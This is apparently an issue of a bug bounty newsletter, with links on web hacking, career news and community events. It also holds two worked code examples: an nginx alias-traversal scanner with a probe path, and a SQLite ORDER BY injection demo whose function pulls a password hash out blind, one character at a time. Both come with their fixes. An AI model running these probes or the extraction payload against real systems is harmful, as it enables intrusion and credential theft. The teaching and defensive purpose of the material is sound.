
🐝 Hive Five 129 - I miss the old internet

Hi friends,

Greetings from the hive!

Happy belated 4th of July. This new internet got me in my feelings.

This time, TweetDeck has been “improved” and will move behind a paywall. This also means that one of my favorite Chrome extensions, BetterTweetDeck, is no more.

Let’s take this week by swarm!

Shot by TESS 

🐝 The Bee’s Knees 

  1. Live web app hacking using Caido with its co-founder sytten. Caido is a lightweight web security auditing toolkit. more 

  2. A hacker interview with Ryan Montgomery aka 0day. more

  3. Full Disclosure - DOM-based XSS And Failures In Bug Bounty Hunting. Kuldeep shares a bug bounty failure and 3 actionable takeaways. more 

  4. Hunting for Nginx Alias Traversals in the wild. This article delves into the intricacies of Nginx, focusing on the location and alias directives that are central to how Nginx handles specific URLs. more

  5. Patch Diffing CVE-2023-28121 to Compromise a WooCommerce. Back in March 2023, Julien noticed an interesting security advisory that was published by Wordfence about a critical “Authentication Bypass and Privilege Escalation” (aka CVE-2023-28121) affecting the “WooCommerce Payments” plugin which has more than 600. more
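
The Nginx alias traversal in item 4 comes down to one substitution rule: for a prefix `location` that uses `alias`, nginx replaces the matched prefix with the alias path verbatim, so `location /static { alias /var/www/app/static/; }` turns a request for `/static../config.ini` into `/var/www/app/static/../config.ini`. The script below is an added example written for this newsletter (it is not from the linked article or from nginx itself): it models that substitution, shows why the trailing-slash variant is safe, and scans a constructed config for the off-by-slash pattern. The sample config, paths and file names are all made up for the demo, and nested blocks inside a `location` are not handled.

```python
import posixpath
import re

# Constructed nginx configuration for the demo (not a real server's config).
SAMPLE_CONFIG = """
server {
    listen 80;

    # vulnerable: prefix lacks a trailing slash, alias has one
    location /static {
        alias /var/www/app/static/;
    }

    # safe: prefix and alias both end in '/'
    location /assets/ {
        alias /var/www/app/assets/;
    }

    # exact match: the URI cannot be extended past the prefix
    location = /favicon.ico {
        alias /var/www/app/static/favicon.ico;
    }

    # root, not alias: the whole URI is appended, so no substitution bug
    location /img {
        root /var/www/app;
    }
}
"""

# location [modifier] path { body }   (bodies with nested blocks are not handled)
LOCATION_RE = re.compile(
    r"location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^{}]*)\}", re.S)
ALIAS_RE = re.compile(r"\balias\s+([^;]+);")


def find_alias_traversals(config):
    """Return prefix locations whose path lacks a trailing slash but use alias."""
    findings = []
    for modifier, path, body in LOCATION_RE.findall(config):
        alias = ALIAS_RE.search(body)
        if alias is None:
            continue
        if modifier in ("=", "~", "~*"):
            # exact and regex locations do not use plain prefix substitution
            continue
        if path.endswith("/"):
            continue
        findings.append({
            "location": path,
            "alias": alias.group(1).strip(),
            "probe": path + "../",
        })
    return findings


def map_uri(location, alias, request_uri):
    """Model nginx's prefix-location + alias substitution for one request.

    nginx removes dot-segments before matching, so '/assets/../x' becomes '/x'
    and no longer matches '/assets/'. But '/static../x' contains no dot-segment,
    survives normalisation, matches the prefix '/static', and the prefix is
    replaced verbatim by the alias path. Returns the filesystem path nginx
    would open, or None when the prefix does not match.
    """
    uri = posixpath.normpath(request_uri)
    if not uri.startswith(location):
        return None
    return posixpath.normpath(alias + uri[len(location):])


def escapes_alias(alias, fs_path):
    """True when the resolved path lies outside the aliased directory."""
    base = posixpath.normpath(alias)
    return fs_path is not None and not fs_path.startswith(base + "/")


if __name__ == "__main__":
    for f in find_alias_traversals(SAMPLE_CONFIG):
        target = map_uri(f["location"], f["alias"], f["probe"] + "config.ini")
        print(f"{f['location']} -> alias {f['alias']}: {f['probe']}config.ini "
              f"resolves to {target} (escapes: {escapes_alias(f['alias'], target)})")
```

The fix is to give the prefix a trailing slash (`location /static/`) so the URI can only be extended with a real path segment, which nginx normalises away if it contains `..`. The scanner only flags the mechanical pattern; confirm each hit with a request for `<prefix>../` against a file you know exists one level up.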

💪 Sponsor

Sponsor the Hive Five and reach a highly engaged community of engineers, security researchers, and ethical hackers who are at the forefront of the industry.

🔥 Buzzworthy

Changelog

  1. TweetDeck has been “improved” and will be a paid feature. more

  2. j3ssie/osmedeus v4.5.0 is a workflow engine for offensive security. more

  3. j3ssie/metabigor v1.2.5 is an OSINT tool and more, without needing API keys. more

  4. For Kali Linux, pip install is on the way out. Python packages must be installed via APT, Kali Linux’s package manager. Python packages coming from other sources should be installed in virtual environments. more

📅 Events

  1. NahamSec is thinking about hosting a bug bounty meet up at Defcon with Jason and STÖK. more

  2. STÖK, Dylan, and Jesper broke stuff for science using…Uranium?! I look forward to seeing the full story. more

  3. Paul started his own company, Coastline Cyber. A boutique cyber security consulting firm. more

  4. People loved Jason’s first live course. The next Bug Hunter’s Methodology takes place this weekend. more

  5. FIRST.org (CVSS) removed the previously celebrated self-service provisioned accounts statement, to many bug bounty hunters’ dismay. more | follow-up

🎉 Celebrate

  1. Kuldeep was recognized as an SRT Hero and member of the Circle of Trust. Let’s go! more

  2. ninetynine was invited to their first Live Hacking Event, in Las Vegas no less. Good luck! more

  3. Jane joined Meta to work on Threads. I can’t wait to see your influence! more

  4. Ian left his job at Robinhood to work on Seats Aero full-time. Awesome! more

💰 Career

  1. TIL there are severance package hunters. more

  2. Corgi shared her fast food history with a surprising twist: Operation Big Mis-Steak. more

  3. Renniepak shares his struggles with taking time off while being self-employed. more

  4. Fletcher, the CIO of Cisco, shares his journey in the tech industry, emphasizing the importance of passion and attitude in succeeding in the constantly changing field. more

  5. Starting a new job? Here are four actionable tips for new hires which you can implement in your first 90 days. more

⚡️ Community

  1. If Twitter falls, the OSINT community needs a new home, says fs0c131y — I’m also concerned with fragmentation and losing the overview. more

  2. A discussion around maximizing bounty payouts vs. proving that actual security vulnerabilities are worth paying for. more

  3. A collection of InfoSec handles on Meta’s Twitter clone, Threads. more

  4. What did you buy with your first bounty payout? more | source

  5. It became public that a hacker accessed HackerOne email addresses in a recently disclosed report. more | discussion

📰 Read

  1. A Journey Into Hacking Google Search Appliance. more

  2. CVE-2023-36934 Analysis: MOVEit Transfer SQL Injection. The focus at ProjectDiscovery is on enhancing their open-source solution, Nuclei, by incorporating templates for trending CVEs. more

  3. Exploiting XXE with local DTD files. This little technique can force your blind XXE to output anything you want. more

  4. DNS Analyzer helps you find DNS vulnerabilities with Burp Suite. more | tool

  5. Why ORMs and Prepared Statements Can’t (Always) Win. The Sonar Research team discovered several SQL injection vulnerabilities in Soko, a software deployed on the Gentoo Linux infrastructure. These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements. more
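
Item 5 is a reminder that a placeholder can only bind a value: a column name in ORDER BY, a table name, or an operator is an identifier, and when developers fall back to string formatting for those the ORM and its prepared statements never see the user input. The example below is added here to show that general class in working code; it is not the Sonar team’s code and does not reproduce Soko’s specific bug, which the blurb does not describe. The SQLite schema, rows and the fake hash are constructed for the demo.

```python
import sqlite3

# Constructed schema and rows for the demo (not Soko's data model).
SEED_SQL = """
CREATE TABLE packages (name TEXT, version TEXT);
CREATE TABLE users (id INTEGER, email TEXT, pw_hash TEXT);
INSERT INTO packages VALUES ('sys-apps/portage', '3.0.45');
INSERT INTO packages VALUES ('www-servers/nginx', '1.24.0');
INSERT INTO users VALUES (1, 'admin@example.org', 'argon2$fake');
"""

# Allow-list: user-facing sort key -> real column identifier
ALLOWED_ORDER = {"name": "name", "version": "version"}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def search_vulnerable(conn, term, order_by):
    """The search value is bound, but the sort column is interpolated.

    A placeholder carries a *value*; ORDER BY wants an identifier, so the
    column name gets formatted into the SQL text, and that is the hole.
    """
    sql = ("SELECT name, version FROM packages WHERE name LIKE ? "
           f"ORDER BY {order_by}")
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def search_bound_identifier(conn, term, order_by):
    """Binding the column name stops the injection but breaks the feature:
    ORDER BY ? sorts by a constant string, so the sort key is ignored."""
    sql = "SELECT name, version FROM packages WHERE name LIKE ? ORDER BY ?"
    return conn.execute(sql, (f"%{term}%", order_by)).fetchall()


def search_fixed(conn, term, order_by):
    """Map the user-supplied sort key onto an allow-listed identifier."""
    column = ALLOWED_ORDER.get(order_by)
    if column is None:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    sql = ("SELECT name, version FROM packages WHERE name LIKE ? "
           f"ORDER BY {column}")
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def extract_hash_prefix(conn, length,
                        alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Blind extraction through the ORDER BY sink of search_vulnerable().

    The CASE expression sorts by name when the guessed character is right and
    by version otherwise; the two orderings put different rows first, which is
    the oracle. No error message or UNION is needed: row order leaks one bit.
    """
    recovered = ""
    for pos in range(1, length + 1):            # substr() is 1-indexed in SQLite
        for c in alphabet:
            payload = (
                f"(CASE WHEN (SELECT substr(pw_hash, {pos}, 1) FROM users "
                f"WHERE id = 1) = '{c}' THEN name ELSE version END)"
            )
            first_row = search_vulnerable(conn, "", payload)[0]
            if first_row[0] == "sys-apps/portage":   # name order => guess was right
                recovered += c
                break
        else:
            break                                    # character outside alphabet
    return recovered


if __name__ == "__main__":
    db = connect()
    print("leaked via ORDER BY:", extract_hash_prefix(db, 6))
    print("allow-listed sort:", search_fixed(db, "", "version"))
```

The takeaway for review: grep for every `f"..."`, `Sprintf` or string concatenation that feeds an ORM query method, and check whether the formatted part is an identifier the user controls. If it is, an allow-list (or the ORM’s own identifier-quoting helper, where one exists) is the fix; binding it as a parameter silently disables the feature instead of securing it.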

🙏 Support

Enjoy reading the Hive Five? You can treat me to a coffee!

📚 Resources

  1. A collection of public security research. more

  2. A discussion around disclosing bug bounty reports and sharing methodologies. more

  3. Whitecyberduck’s useful Cybersecurity Websites. more

  4. Books that have significantly impacted how people do business. more

  5. Sleuthcon 2023 videos have been posted. This conference is designed to highlight the work done by people and organizations to identify and explore cybercrime and financially-motivated cyber threats. more

🎥 Watch

  1. JWT Authentication Bypass via jwk Header Injection. Learn about JSON Web Token (JWT) vulnerabilities. more

  2. Top 3 bug bounty tips by NahamSec, who made $100K in 2 months. more

  3. Generic HTML Sanitizer Bypass Investigation. LiveOverflow stumbled upon a weird HTML behavior on Twitter and started to investigate it. more

  4. Ippsec takes on another HackTheBox box, Inject. more

  5. Rana is back with Web Security Academy. This time she covers Authentication Vulnerabilities - Lab #1 Username enumeration via different responses. more

🎵 Listen

  1. We Hack Purple Podcast 79 with Isabelle Mauny, where they discuss several of the challenges when creating secure APIs. more

  2. Archwisp shared offline copies of all of the Defcon parties’ mixes and videos. more

  3. Smashing Security 329: Pornhub, Barbie dolls, and can you trust a free TV? more

  4. Critical Thinking - Bug Bounty Podcast Episode 26: Client-side Quirks & Browser Hacks. more

Get $200 to try DigitalOcean. Level up your bug bounty game with the ultimate VPS solution. It’s my go-to for all recon, automation, and even VPN needs. Get access to a comprehensive range of cloud resources, all at an affordable price.
